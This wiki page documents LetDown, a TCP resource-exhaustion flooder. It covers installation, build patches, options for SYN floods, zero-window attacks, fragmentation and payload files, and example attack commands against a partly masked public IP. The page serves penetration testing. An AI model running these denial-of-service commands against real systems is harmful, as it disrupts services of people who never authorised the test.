Complemento/LetDown

From aldeid
Jump to navigation Jump to search
You are here:
LetDown

Description

LetDown is a tcp flooder that is inspired from the article "TCP Resource Exhaustion and Botched Disclosure" from Fyodor (http://insecure.org/stf/tcp-dos-attack-explained.html). It has an (experimental) userland TCP/IP stack, and supports multistage payloads for complex protocols, fragmentation of packets and variable tcp window.

Installation

Download and uncompress

First of all download complemento:

$ mkdir -p /pentest/enumeration/
$ cd /pentest/enumeration/
$ wget http://downloads.sourceforge.net/project/complemento/complemento/complemento-0.7.6/complemento-0.7.6.tar.gz
$ tar xzvf complemento-0.7.6.tar.gz
$ cd complemento/letdown/

At this stage, check your version of Python:

$ python -V
Python 2.6.5

Python 2.5

If your version of Python is 2.5, you can directly compile:

$ make

Python 2.6

If you have Python 2.6, you need to apply this patch:

$ wget http://dl.dropbox.com/u/10761700/letdown-python2.6.patch
$ patch -p0 < letdown-python2.6.patch

Then you can compile:

$ make
Note
The make command will output warnings. They aren't errors, just warning, and nothing blocking.

Usage

Basic syntax

$ sudo ./letdown -d destination ip -p port [options]
Note
Notice that letdown requires root privileges.

Common Options

-d
destination ip address or dns name, target
-p
destination port
-s
source ip address
-x
first source port (default 1025)
-y
last source port (default 65534)
-l
enables infinite loop mode
-i
network interface
-t
sleep time in microseconds (default 10000)
-a
max time in second for waiting responses (default 40)

Extra options

-v
verbosity level (0=quiet, 1=normal, 2=verbose)
-f
automagically set firewall rules for blocking rst packet generated by the kernel
examples: -f iptables, -f blackhole (for freebsd)
-L
special interaction levels with the target
  • s: syn flooding, no 3-way-handshake
  • a: send acknowledgment packets (polite mode)
  • f: send finalize packets (include polite mode)
  • r: send reset packets (check firewall rules...)
-W
window size for ack packets (ex: 0-window attack)
-O
enable ack fragmentation and set fragment offset delta
-C
fragment counter if fragmentation is enabled (default 1)
-P
payload file (see payloads directory...)
-M
multistage payload file (see payloads directory...)

Examples

  • Generic attack
$ sudo ./letdown -d 208.xx.xx.xx -s 192.168.1.x -p 21
  • Attack against a webserver using payload and firewall options:
$ sudo ./letdown -d 208.xx.xx.xx -s 192.168.1.x -p 80 -f iptables -P payloads/http.txt
  • Connections from 3 ports < 1024 and with the time option:
$ sudo ./letdown -d 208.xx.xx.xx -s 192.168.1.x -p 80 -x 80 -y 100 -t 10000

Comments